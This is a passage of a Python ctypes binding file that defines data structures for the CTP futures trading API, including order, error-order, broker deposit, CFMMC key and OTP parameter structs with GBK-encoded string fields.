self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if CombInstrumentID:
self.CombInstrumentID = CombInstrumentID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class MarketDataAveragePrice(Struct):
_fields_ = [
("AveragePrice", c_double),
]
def __init__(self, AveragePrice=None):
super().__init__()
if AveragePrice:
self.AveragePrice = AveragePrice
class VerifyInvestorPassword(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("Password", c_char_Array_41),
]
def __init__(self, BrokerID=None, InvestorID=None, Password=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
class UserIP(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("IPAddress", c_char_Array_16),
("IPMask", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, BrokerID=None, UserID=None, IPAddress=None, IPMask=None, MacAddress=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if IPMask:
self.IPMask = IPMask.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class TradingNoticeInfo(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("SendTime", c_char_Array_9),
("FieldContent", c_char_Array_501),
("SequenceSeries", c_short),
("SequenceNo", c_int),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, SendTime=None, FieldContent=None, SequenceSeries=None, SequenceNo=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if SendTime:
self.SendTime = SendTime.encode("GBK")
if FieldContent:
self.FieldContent = FieldContent.encode("GBK")
if SequenceSeries:
self.SequenceSeries = SequenceSeries
if SequenceNo:
self.SequenceNo = SequenceNo
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class TradingNotice(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorRange", c_char),
("InvestorID", c_char_Array_13),
("SequenceSeries", c_short),
("UserID", c_char_Array_16),
("SendTime", c_char_Array_9),
("SequenceNo", c_int),
("FieldContent", c_char_Array_501),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorRange=None, InvestorID=None, SequenceSeries=None, UserID=None, SendTime=None, SequenceNo=None, FieldContent=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorRange:
self.InvestorRange = InvestorRange.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if SequenceSeries:
self.SequenceSeries = SequenceSeries
if UserID:
self.UserID = UserID.encode("GBK")
if SendTime:
self.SendTime = SendTime.encode("GBK")
if SequenceNo:
self.SequenceNo = SequenceNo
if FieldContent:
self.FieldContent = FieldContent.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class QryTradingNotice(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class QryErrOrder(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
]
def __init__(self, BrokerID=None, InvestorID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
class ErrOrder(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("OrderRef", c_char_Array_13),
("UserID", c_char_Array_16),
("OrderPriceType", c_char),
("Direction", c_char),
("CombOffsetFlag", c_char_Array_5),
("CombHedgeFlag", c_char_Array_5),
("LimitPrice", c_double),
("VolumeTotalOriginal", c_int),
("TimeCondition", c_char),
("GTDDate", c_char_Array_9),
("VolumeCondition", c_char),
("MinVolume", c_int),
("ContingentCondition", c_char),
("StopPrice", c_double),
("ForceCloseReason", c_char),
("IsAutoSuspend", c_int),
("BusinessUnit", c_char_Array_21),
("RequestID", c_int),
("UserForceClose", c_int),
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
("IsSwapOrder", c_int),
("ExchangeID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
("AccountID", c_char_Array_13),
("CurrencyID", c_char_Array_4),
("ClientID", c_char_Array_11),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, OrderRef=None, UserID=None, OrderPriceType=None, Direction=None, CombOffsetFlag=None, CombHedgeFlag=None, LimitPrice=None, VolumeTotalOriginal=None, TimeCondition=None, GTDDate=None, VolumeCondition=None, MinVolume=None, ContingentCondition=None, StopPrice=None, ForceCloseReason=None, IsAutoSuspend=None, BusinessUnit=None, RequestID=None, UserForceClose=None, ErrorID=None, ErrorMsg=None, IsSwapOrder=None, ExchangeID=None, InvestUnitID=None, AccountID=None, CurrencyID=None, ClientID=None, IPAddress=None, MacAddress=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if OrderRef:
self.OrderRef = OrderRef.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if OrderPriceType:
self.OrderPriceType = OrderPriceType.encode("GBK")
if Direction:
self.Direction = Direction.encode("GBK")
if CombOffsetFlag:
self.CombOffsetFlag = CombOffsetFlag.encode("GBK")
if CombHedgeFlag:
self.CombHedgeFlag = CombHedgeFlag.encode("GBK")
if LimitPrice:
self.LimitPrice = LimitPrice
if VolumeTotalOriginal:
self.VolumeTotalOriginal = VolumeTotalOriginal
if TimeCondition:
self.TimeCondition = TimeCondition.encode("GBK")
if GTDDate:
self.GTDDate = GTDDate.encode("GBK")
if VolumeCondition:
self.VolumeCondition = VolumeCondition.encode("GBK")
if MinVolume:
self.MinVolume = MinVolume
if ContingentCondition:
self.ContingentCondition = ContingentCondition.encode("GBK")
if StopPrice:
self.StopPrice = StopPrice
if ForceCloseReason:
self.ForceCloseReason = ForceCloseReason.encode("GBK")
if IsAutoSuspend:
self.IsAutoSuspend = IsAutoSuspend
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if RequestID:
self.RequestID = RequestID
if UserForceClose:
self.UserForceClose = UserForceClose
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
if IsSwapOrder:
self.IsSwapOrder = IsSwapOrder
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class ErrorConditionalOrder(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("OrderRef", c_char_Array_13),
("UserID", c_char_Array_16),
("OrderPriceType", c_char),
("Direction", c_char),
("CombOffsetFlag", c_char_Array_5),
("CombHedgeFlag", c_char_Array_5),
("LimitPrice", c_double),
("VolumeTotalOriginal", c_int),
("TimeCondition", c_char),
("GTDDate", c_char_Array_9),
("VolumeCondition", c_char),
("MinVolume", c_int),
("ContingentCondition", c_char),
("StopPrice", c_double),
("ForceCloseReason", c_char),
("IsAutoSuspend", c_int),
("BusinessUnit", c_char_Array_21),
("RequestID", c_int),
("OrderLocalID", c_char_Array_13),
("ExchangeID", c_char_Array_9),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("ExchangeInstID", c_char_Array_31),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("OrderSubmitStatus", c_char),
("NotifySequence", c_int),
("TradingDay", c_char_Array_9),
("SettlementID", c_int),
("OrderSysID", c_char_Array_21),
("OrderSource", c_char),
("OrderStatus", c_char),
("OrderType", c_char),
("VolumeTraded", c_int),
("VolumeTotal", c_int),
("InsertDate", c_char_Array_9),
("InsertTime", c_char_Array_9),
("ActiveTime", c_char_Array_9),
("SuspendTime", c_char_Array_9),
("UpdateTime", c_char_Array_9),
("CancelTime", c_char_Array_9),
("ActiveTraderID", c_char_Array_21),
("ClearingPartID", c_char_Array_11),
("SequenceNo", c_int),
("FrontID", c_int),
("SessionID", c_int),
("UserProductInfo", c_char_Array_11),
("StatusMsg", c_char_Array_81),
("UserForceClose", c_int),
("ActiveUserID", c_char_Array_16),
("BrokerOrderSeq", c_int),
("RelativeOrderSysID", c_char_Array_21),
("ZCETotalTradedVolume", c_int),
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
("IsSwapOrder", c_int),
("BranchID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
("AccountID", c_char_Array_13),
("CurrencyID", c_char_Array_4),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, OrderRef=None, UserID=None, OrderPriceType=None, Direction=None, CombOffsetFlag=None, CombHedgeFlag=None, LimitPrice=None, VolumeTotalOriginal=None, TimeCondition=None, GTDDate=None, VolumeCondition=None, MinVolume=None, ContingentCondition=None, StopPrice=None, ForceCloseReason=None, IsAutoSuspend=None, BusinessUnit=None, RequestID=None, OrderLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, OrderSubmitStatus=None, NotifySequence=None, TradingDay=None, SettlementID=None, OrderSysID=None, OrderSource=None, OrderStatus=None, OrderType=None, VolumeTraded=None, VolumeTotal=None, InsertDate=None, InsertTime=None, ActiveTime=None, SuspendTime=None, UpdateTime=None, CancelTime=None, ActiveTraderID=None, ClearingPartID=None, SequenceNo=None, FrontID=None, SessionID=None, UserProductInfo=None, StatusMsg=None, UserForceClose=None, ActiveUserID=None, BrokerOrderSeq=None, RelativeOrderSysID=None, ZCETotalTradedVolume=None, ErrorID=None, ErrorMsg=None, IsSwapOrder=None, BranchID=None, InvestUnitID=None, AccountID=None, CurrencyID=None, IPAddress=None, MacAddress=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if OrderRef:
self.OrderRef = OrderRef.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if OrderPriceType:
self.OrderPriceType = OrderPriceType.encode("GBK")
if Direction:
self.Direction = Direction.encode("GBK")
if CombOffsetFlag:
self.CombOffsetFlag = CombOffsetFlag.encode("GBK")
if CombHedgeFlag:
self.CombHedgeFlag = CombHedgeFlag.encode("GBK")
if LimitPrice:
self.LimitPrice = LimitPrice
if VolumeTotalOriginal:
self.VolumeTotalOriginal = VolumeTotalOriginal
if TimeCondition:
self.TimeCondition = TimeCondition.encode("GBK")
if GTDDate:
self.GTDDate = GTDDate.encode("GBK")
if VolumeCondition:
self.VolumeCondition = VolumeCondition.encode("GBK")
if MinVolume:
self.MinVolume = MinVolume
if ContingentCondition:
self.ContingentCondition = ContingentCondition.encode("GBK")
if StopPrice:
self.StopPrice = StopPrice
if ForceCloseReason:
self.ForceCloseReason = ForceCloseReason.encode("GBK")
if IsAutoSuspend:
self.IsAutoSuspend = IsAutoSuspend
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if RequestID:
self.RequestID = RequestID
if OrderLocalID:
self.OrderLocalID = OrderLocalID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if OrderSubmitStatus:
self.OrderSubmitStatus = OrderSubmitStatus.encode("GBK")
if NotifySequence:
self.NotifySequence = NotifySequence
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if SettlementID:
self.SettlementID = SettlementID
if OrderSysID:
self.OrderSysID = OrderSysID.encode("GBK")
if OrderSource:
self.OrderSource = OrderSource.encode("GBK")
if OrderStatus:
self.OrderStatus = OrderStatus.encode("GBK")
if OrderType:
self.OrderType = OrderType.encode("GBK")
if VolumeTraded:
self.VolumeTraded = VolumeTraded
if VolumeTotal:
self.VolumeTotal = VolumeTotal
if InsertDate:
self.InsertDate = InsertDate.encode("GBK")
if InsertTime:
self.InsertTime = InsertTime.encode("GBK")
if ActiveTime:
self.ActiveTime = ActiveTime.encode("GBK")
if SuspendTime:
self.SuspendTime = SuspendTime.encode("GBK")
if UpdateTime:
self.UpdateTime = UpdateTime.encode("GBK")
if CancelTime:
self.CancelTime = CancelTime.encode("GBK")
if ActiveTraderID:
self.ActiveTraderID = ActiveTraderID.encode("GBK")
if ClearingPartID:
self.ClearingPartID = ClearingPartID.encode("GBK")
if SequenceNo:
self.SequenceNo = SequenceNo
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if UserProductInfo:
self.UserProductInfo = UserProductInfo.encode("GBK")
if StatusMsg:
self.StatusMsg = StatusMsg.encode("GBK")
if UserForceClose:
self.UserForceClose = UserForceClose
if ActiveUserID:
self.ActiveUserID = ActiveUserID.encode("GBK")
if BrokerOrderSeq:
self.BrokerOrderSeq = BrokerOrderSeq
if RelativeOrderSysID:
self.RelativeOrderSysID = RelativeOrderSysID.encode("GBK")
if ZCETotalTradedVolume:
self.ZCETotalTradedVolume = ZCETotalTradedVolume
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
if IsSwapOrder:
self.IsSwapOrder = IsSwapOrder
if BranchID:
self.BranchID = BranchID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class QryErrOrderAction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
]
def __init__(self, BrokerID=None, InvestorID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
class ErrOrderAction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("OrderActionRef", c_int),
("OrderRef", c_char_Array_13),
("RequestID", c_int),
("FrontID", c_int),
("SessionID", c_int),
("ExchangeID", c_char_Array_9),
("OrderSysID", c_char_Array_21),
("ActionFlag", c_char),
("LimitPrice", c_double),
("VolumeChange", c_int),
("ActionDate", c_char_Array_9),
("ActionTime", c_char_Array_9),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("OrderLocalID", c_char_Array_13),
("ActionLocalID", c_char_Array_13),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("BusinessUnit", c_char_Array_21),
("OrderActionStatus", c_char),
("UserID", c_char_Array_16),
("StatusMsg", c_char_Array_81),
("InstrumentID", c_char_Array_31),
("BranchID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
]
def __init__(self, BrokerID=None, InvestorID=None, OrderActionRef=None, OrderRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, OrderSysID=None, ActionFlag=None, LimitPrice=None, VolumeChange=None, ActionDate=None, ActionTime=None, TraderID=None, InstallID=None, OrderLocalID=None, ActionLocalID=None, ParticipantID=None, ClientID=None, BusinessUnit=None, OrderActionStatus=None, UserID=None, StatusMsg=None, InstrumentID=None, BranchID=None, InvestUnitID=None, IPAddress=None, MacAddress=None, ErrorID=None, ErrorMsg=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if OrderActionRef:
self.OrderActionRef = OrderActionRef
if OrderRef:
self.OrderRef = OrderRef.encode("GBK")
if RequestID:
self.RequestID = RequestID
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if OrderSysID:
self.OrderSysID = OrderSysID.encode("GBK")
if ActionFlag:
self.ActionFlag = ActionFlag.encode("GBK")
if LimitPrice:
self.LimitPrice = LimitPrice
if VolumeChange:
self.VolumeChange = VolumeChange
if ActionDate:
self.ActionDate = ActionDate.encode("GBK")
if ActionTime:
self.ActionTime = ActionTime.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if OrderLocalID:
self.OrderLocalID = OrderLocalID.encode("GBK")
if ActionLocalID:
self.ActionLocalID = ActionLocalID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if OrderActionStatus:
self.OrderActionStatus = OrderActionStatus.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if StatusMsg:
self.StatusMsg = StatusMsg.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if BranchID:
self.BranchID = BranchID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
class QryExchangeSequence(Struct):
_fields_ = [
("ExchangeID", c_char_Array_9),
]
def __init__(self, ExchangeID=None):
super().__init__()
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
class ExchangeSequence(Struct):
_fields_ = [
("ExchangeID", c_char_Array_9),
("SequenceNo", c_int),
("MarketStatus", c_char),
]
def __init__(self, ExchangeID=None, SequenceNo=None, MarketStatus=None):
super().__init__()
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if SequenceNo:
self.SequenceNo = SequenceNo
if MarketStatus:
self.MarketStatus = MarketStatus.encode("GBK")
class QueryMaxOrderVolumeWithPrice(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("Direction", c_char),
("OffsetFlag", c_char),
("HedgeFlag", c_char),
("MaxVolume", c_int),
("Price", c_double),
("ExchangeID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, Direction=None, OffsetFlag=None, HedgeFlag=None, MaxVolume=None, Price=None, ExchangeID=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if Direction:
self.Direction = Direction.encode("GBK")
if OffsetFlag:
self.OffsetFlag = OffsetFlag.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if MaxVolume:
self.MaxVolume = MaxVolume
if Price:
self.Price = Price
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class QryBrokerTradingParams(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("CurrencyID", c_char_Array_4),
("AccountID", c_char_Array_13),
]
def __init__(self, BrokerID=None, InvestorID=None, CurrencyID=None, AccountID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
class BrokerTradingParams(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("MarginPriceType", c_char),
("Algorithm", c_char),
("AvailIncludeCloseProfit", c_char),
("CurrencyID", c_char_Array_4),
("OptionRoyaltyPriceType", c_char),
("AccountID", c_char_Array_13),
]
def __init__(self, BrokerID=None, InvestorID=None, MarginPriceType=None, Algorithm=None, AvailIncludeCloseProfit=None, CurrencyID=None, OptionRoyaltyPriceType=None, AccountID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if MarginPriceType:
self.MarginPriceType = MarginPriceType.encode("GBK")
if Algorithm:
self.Algorithm = Algorithm.encode("GBK")
if AvailIncludeCloseProfit:
self.AvailIncludeCloseProfit = AvailIncludeCloseProfit.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if OptionRoyaltyPriceType:
self.OptionRoyaltyPriceType = OptionRoyaltyPriceType.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
class QryBrokerTradingAlgos(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("ExchangeID", c_char_Array_9),
("InstrumentID", c_char_Array_31),
]
def __init__(self, BrokerID=None, ExchangeID=None, InstrumentID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
class BrokerTradingAlgos(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("ExchangeID", c_char_Array_9),
("InstrumentID", c_char_Array_31),
("HandlePositionAlgoID", c_char),
("FindMarginRateAlgoID", c_char),
("HandleTradingAccountAlgoID", c_char),
]
def __init__(self, BrokerID=None, ExchangeID=None, InstrumentID=None, HandlePositionAlgoID=None, FindMarginRateAlgoID=None, HandleTradingAccountAlgoID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if HandlePositionAlgoID:
self.HandlePositionAlgoID = HandlePositionAlgoID.encode("GBK")
if FindMarginRateAlgoID:
self.FindMarginRateAlgoID = FindMarginRateAlgoID.encode("GBK")
if HandleTradingAccountAlgoID:
self.HandleTradingAccountAlgoID = HandleTradingAccountAlgoID.encode("GBK")
class QueryBrokerDeposit(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("ExchangeID", c_char_Array_9),
]
def __init__(self, BrokerID=None, ExchangeID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
class BrokerDeposit(Struct):
_fields_ = [
("TradingDay", c_char_Array_9),
("BrokerID", c_char_Array_11),
("ParticipantID", c_char_Array_11),
("ExchangeID", c_char_Array_9),
("PreBalance", c_double),
("CurrMargin", c_double),
("CloseProfit", c_double),
("Balance", c_double),
("Deposit", c_double),
("Withdraw", c_double),
("Available", c_double),
("Reserve", c_double),
("FrozenMargin", c_double),
]
def __init__(self, TradingDay=None, BrokerID=None, ParticipantID=None, ExchangeID=None, PreBalance=None, CurrMargin=None, CloseProfit=None, Balance=None, Deposit=None, Withdraw=None, Available=None, Reserve=None, FrozenMargin=None):
super().__init__()
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if PreBalance:
self.PreBalance = PreBalance
if CurrMargin:
self.CurrMargin = CurrMargin
if CloseProfit:
self.CloseProfit = CloseProfit
if Balance:
self.Balance = Balance
if Deposit:
self.Deposit = Deposit
if Withdraw:
self.Withdraw = Withdraw
if Available:
self.Available = Available
if Reserve:
self.Reserve = Reserve
if FrozenMargin:
self.FrozenMargin = FrozenMargin
class QryCFMMCBrokerKey(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
]
def __init__(self, BrokerID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
class CFMMCBrokerKey(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("ParticipantID", c_char_Array_11),
("CreateDate", c_char_Array_9),
("CreateTime", c_char_Array_9),
("KeyID", c_int),
("CurrentKey", c_char_Array_21),
("KeyKind", c_char),
]
def __init__(self, BrokerID=None, ParticipantID=None, CreateDate=None, CreateTime=None, KeyID=None, CurrentKey=None, KeyKind=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if CreateDate:
self.CreateDate = CreateDate.encode("GBK")
if CreateTime:
self.CreateTime = CreateTime.encode("GBK")
if KeyID:
self.KeyID = KeyID
if CurrentKey:
self.CurrentKey = CurrentKey.encode("GBK")
if KeyKind:
self.KeyKind = KeyKind.encode("GBK")
class CFMMCTradingAccountKey(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("ParticipantID", c_char_Array_11),
("AccountID", c_char_Array_13),
("KeyID", c_int),
("CurrentKey", c_char_Array_21),
]
def __init__(self, BrokerID=None, ParticipantID=None, AccountID=None, KeyID=None, CurrentKey=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if KeyID:
self.KeyID = KeyID
if CurrentKey:
self.CurrentKey = CurrentKey.encode("GBK")
class QryCFMMCTradingAccountKey(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
]
def __init__(self, BrokerID=None, InvestorID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
class BrokerUserOTPParam(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("OTPVendorsID", c_char_Array_2),
("SerialNumber", c_char_Array_17),
("AuthKey", c_char_Array_41),
("LastDrift", c_int),
("LastSuccess", c_int),
("OTPType", c_char),
]
def __init__(self, BrokerID=None, UserID=None, OTPVendorsID=None, SerialNumber=None, AuthKey=None, LastDrift=None, LastSuccess=None, OTPType=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if OTPVendorsID:
self.OTPVendorsID = OTPVendorsID.encode("GBK")
if SerialNumber:
self.SerialNumber = SerialNumber.encode("GBK")
if AuthKey:
self.AuthKey = AuthKey.encode("GBK")
if LastDrift:
self.LastDrift = LastDrift
if LastSuccess:
self.LastSuccess = LastSuccess
if OTPType:
self.OTPType = OTPType.encode("GBK")
class ManualSyncBrokerUserOTP(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("OTPType", c_char),
("FirstOTP", c_char_Array_41),
("SecondOTP", c_char_Array_41),
]
def __init__(self, BrokerID=None, UserID=None, OTPType=None, FirstOTP=None, SecondOTP=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if OTPType:
self.OTPType = OTPType.encode("GBK")
if FirstOTP:
self.FirstOTP = FirstOTP.encode("GBK")
if SecondOTP:
self.SecondOTP = SecondOTP.encode("GBK")
class CommRateModel(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("CommModelID", c_char_Array_13),
("CommModelName", c_char_Array_161),
]
def __init__(self, BrokerID=None, CommModelID=None, CommModelName=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if CommModelID:
self.CommModelID = CommModelID.encode("GBK")
if CommModelName:
self.CommModelName = CommModelName.encode("GBK")
class QryCommRateModel(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("CommModelID", c_char_Array_13),
]
def __init__(self, BrokerID=None, CommModelID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if CommModelID:
self.CommModelID = CommModelID.encode("GBK")
class MarginModel(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("MarginModelID", c_char_Array_13),
("MarginModelName", c_char_Array_161),
]
def __init__(self, BrokerID=None, MarginModelID=None, MarginModelName=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if MarginModelID:
self.MarginModelID = MarginModelID.encode("GBK")
if MarginModelName:
self.MarginModelName = MarginModelName.encode("GBK")
class QryMarginModel(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("MarginModelID", c_char_Array_13),
]
